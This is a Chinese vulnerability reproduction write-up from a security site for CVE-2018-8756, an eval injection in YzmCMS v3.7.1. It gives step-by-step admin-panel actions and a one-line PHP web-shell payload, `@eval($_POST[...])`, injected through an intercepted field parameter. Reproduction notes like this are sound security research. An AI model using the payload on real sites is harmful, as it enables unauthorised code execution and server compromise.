menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 149-YzmCMS chevron_right 004-CVE-2018-8756 YzmCMS v3.7.1 Eval注入漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    004-CVE-2018-8756 YzmCMS v3.7.1 Eval注入漏洞.md
    1.41 KB / 2021-07-17 00:01:22
        # CVE-2018-8756 YzmCMS v3.7.1 Eval注入漏洞
    
    ### 一、漏洞简介
    
    YzmCMS是中国程序员袁志蒙开发的一套开源的CMS(内容管理系统)。 YzmCMS 3.7.1版本中的yzmphp/core/function/global.func.php文件存在安全漏洞。远程攻击者可借助index.php?m=member&c=member_content&a=init请求的POST数据中的PHP代码利用该漏洞执行任意代码。
    
    ### 二、漏洞影响
    
    YzmCMS v3.7.1
    
    ### 三、复现过程
    
    首先,从网站后台登陆,`/index.php?m=admin&c=index&a=init`,然后选择模型管理,选 择模型 ID 为 1 的那个字段管理,然后添加字段,像下面这张图一样填表。
    
    ![](images/15896470486182.png)
    
    
    接着需要拦截数据包,像图片一样,
    
    
    ```
    修改 fieldtype 为 datetime,修改 datesest 为 array(1);@eval($_POST[wushuang])
    ```
    
    ![](images/15896470633813.png)
    
    
    接着我们需要一个用户可以触发这个漏洞,选择会员管理,选择会员管理,添加用户, 填表如下。
    
    ![](images/15896470704134.png)
    
    
    现 在 我 们 已 经 完 成 了 准 备 工 作 , 接 着 以 用 户 身 份 登 陆 , `guici/123456,/index.php?m=member&c=index&a=login`,点击在线投稿,接着你就可以执行任 意代码通过输入 post 数据 `wushuang!/index.php?m=member&c=member_content&a=init`
    
    ![](images/15896470948707.png)
    
    
    参考链接
    
    https://github.com/guiciwushuang/yzmcms/blob/master/yzmcms_eval_injection_chinese.pdf
    
    links
    file_download